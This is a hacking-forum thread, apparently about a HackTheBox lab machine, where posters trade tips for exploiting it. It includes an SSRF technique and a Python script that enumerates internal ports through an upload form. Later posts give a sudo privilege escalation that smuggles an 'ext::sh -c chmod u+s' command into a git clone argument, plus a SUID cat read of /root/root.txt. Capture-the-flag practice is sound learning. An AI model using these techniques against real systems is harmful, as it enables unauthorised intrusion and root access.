Posts: 59
Threads: 1
Joined: Jun 2024
(Jun 17, 2024, 04:41 AM)officialspeck Wrote:  nice please any idea on skyfall root flag.
https://namiq.net/blog/htb-skyfall-writeup-hackthebox
Posts: 245
Threads: 29
Joined: Nov 2023
(Jun 17, 2024, 06:46 AM)Axura Wrote: (Jun 16, 2024, 11:46 AM)inactive Wrote: (Jun 16, 2024, 10:08 AM)macavitysworld Wrote: (Jun 16, 2024, 09:48 AM)teky Wrote: (Jun 16, 2024, 08:45 AM)macavitysworld Wrote: Internal scanning reveals port 5000 and the api endpoint
Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b
Where do you find it? Is it here like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000
If you are looking for api end point:
- Add url : http://127.0.0.1:5000
- click preview
- right click on the corrupted image preview
- open in a new tab, F12 and check the network tab, response
- You can find the endpoint
https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy
Or learn to use burp
And if you are wondering about the port it's basic internal network scanning with burpsuite. You have the option to add url in the /upload page
Do a basic intruder attack on PORT number and check for the response, if you can find anything odd.
for eg. https://prnt.sc/pC17U2iUR75r
in here i have taken the payload as numbers, but you can add your custom list of ports. If you check the content length, you can find the content length is different from rest of the requests.
here is how i added the payload position: https://prnt.sc/PN5y1zBMPgv9
is there way to scan internal ports automatically? Or only way to do it is by hands? like checking 80, 22...
if there is way, how to scan?
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
from pwn import log
bar = log.progress("Port Enumeration")
# URLs
base_url = "http://editorial.htb"
upload_url = f"{base_url}/upload-cover"
# Dummy headers
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36',
'Accept': '*/*',
'Origin': base_url,
'Referer': f"{base_url}/upload",
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close'
}
# List of common ports for 127.0.0.1
common_ports = [80, 443, 8080, 3306, 8000, 3000, 5000, 5432, 22, 25, 27017, 6379, 9200, 7474,]
# Port enum
for port in common_ports:
# for port in range(1, 10000):
bar.status(f"Testing port: {port}")
# Create the form data
m = MultipartEncoder(
fields={
'bookurl': f'http://127.0.0.1:{port}',
'bookfile': ('axura.jpg', open('/home/axura/HTB/editorial/axura.jpg', 'rb'), 'image/jpeg'), # change this dummy jpg path
}
)
headers['Content-Type'] = m.content_type
try:
response = requests.post(upload_url, headers=headers, data=m)
if response.status_code == 200 and 'image' not in response.text:
bar.success(f"Port {port} might be open! Valid response received.")
print(f"Response URL: {base_url}/{response.text.strip()}")
else:
pass
except requests.exceptions.RequestException as e:
print(f"Request failed on port {port}: {str(e)}")
This is another method for advanced users 
Thanks @paw for the rank!!
Posts: 20
Threads: 0
Joined: May 2024
(Jun 16, 2024, 11:46 AM)inactive Wrote: (Jun 16, 2024, 10:08 AM)macavitysworld Wrote: (Jun 16, 2024, 09:48 AM)teky Wrote: (Jun 16, 2024, 08:45 AM)macavitysworld Wrote: (Jun 16, 2024, 08:37 AM)ARhOmOuTEd Wrote: How do you know, that port 5000 is open on the inside of the box?
Where did you find the api?
Internal scanning reveals port 5000 and the api endpoint
Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b
Where do you find it? Is it here like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000
If you are looking for api end point:
- Add url : http://127.0.0.1:5000
- click preview
- right click on the corrupted image preview
- open in a new tab, F12 and check the network tab, response
- You can find the endpoint
https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy
Or learn to use burp
And if you are wondering about the port it's basic internal network scanning with burpsuite. You have the option to add url in the /upload page
Do a basic intruder attack on PORT number and check for the response, if you can find anything odd.
for eg. https://prnt.sc/pC17U2iUR75r
in here i have taken the payload as numbers, but you can add your custom list of ports. If you check the content length, you can find the content length is different from rest of the requests.
here is how i added the payload position: https://prnt.sc/PN5y1zBMPgv9
is there way to scan internal ports automatically? Or only way to do it is by hands? like checking 80, 22...
if there is way, how to scan?
netstat -tulnp
Posts: 11
Threads: 0
Joined: Jun 2024
Really enjoying following this thread. It's a great chance to learn how different people approach problems. The diversity in problem-solving methods is so interesting and educational. Keep up the great work!
Posts: 4
Threads: 0
Joined: Jun 2024
Can somebody explain me why i have this error?
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext:  h -c chmod%u+s%/tmp/priv.sh new_changes
stderr: 'fatal: destination path 'new_changes' already exists and is not an empty directory.
Posts: 33
Threads: 1
Joined: Apr 2024
(Jun 21, 2024, 02:31 PM)simple_user Wrote: Can somebody explain me why i have this error?
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c chmod%u+s%/tmp/priv.sh new_changes
stderr: 'fatal: destination path 'new_changes' already exists and is not an empty directory.
If the directory new_changes exists, execute:
rm -rf /opt/internal_apps/clone_changes/new_changes
and then:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% u+s% /tmp/priv.sh'
Posts: 4
Threads: 0
Joined: Jun 2024
(Jun 22, 2024, 06:42 AM)imassxck Wrote: (Jun 21, 2024, 02:31 PM)simple_user Wrote: Can somebody explain me why i have this error?
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext:h -c chmod%u+s%/tmp/priv.sh new_changes
stderr: 'fatal: destination path 'new_changes' already exists and is not an empty directory.
If the directory new_changes exists, execute:
rm -rf /opt/internal_apps/clone_changes/new_changes
and then:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext:h -c chmod% u+s% /tmp/priv.sh'
Thanks
Posts: 101
Threads: 2
Joined: Jun 2023
thx dude, thx for sharing
Posts: 1
Threads: 0
Joined: Sep 2024
Sep 26, 2024, 11:58 AM
(This post was last modified: Sep 26, 2024, 11:59 AM by Rush1521.)
if you only want the flag,
I got cat as suid (but i guess someone did it before me with prod) ,
so use gtfobins
https://gtfobins.github.io/gtfobins/cat/
and run
LFILE=/root/root.txt
cat "$LFILE"
always worth the check
|
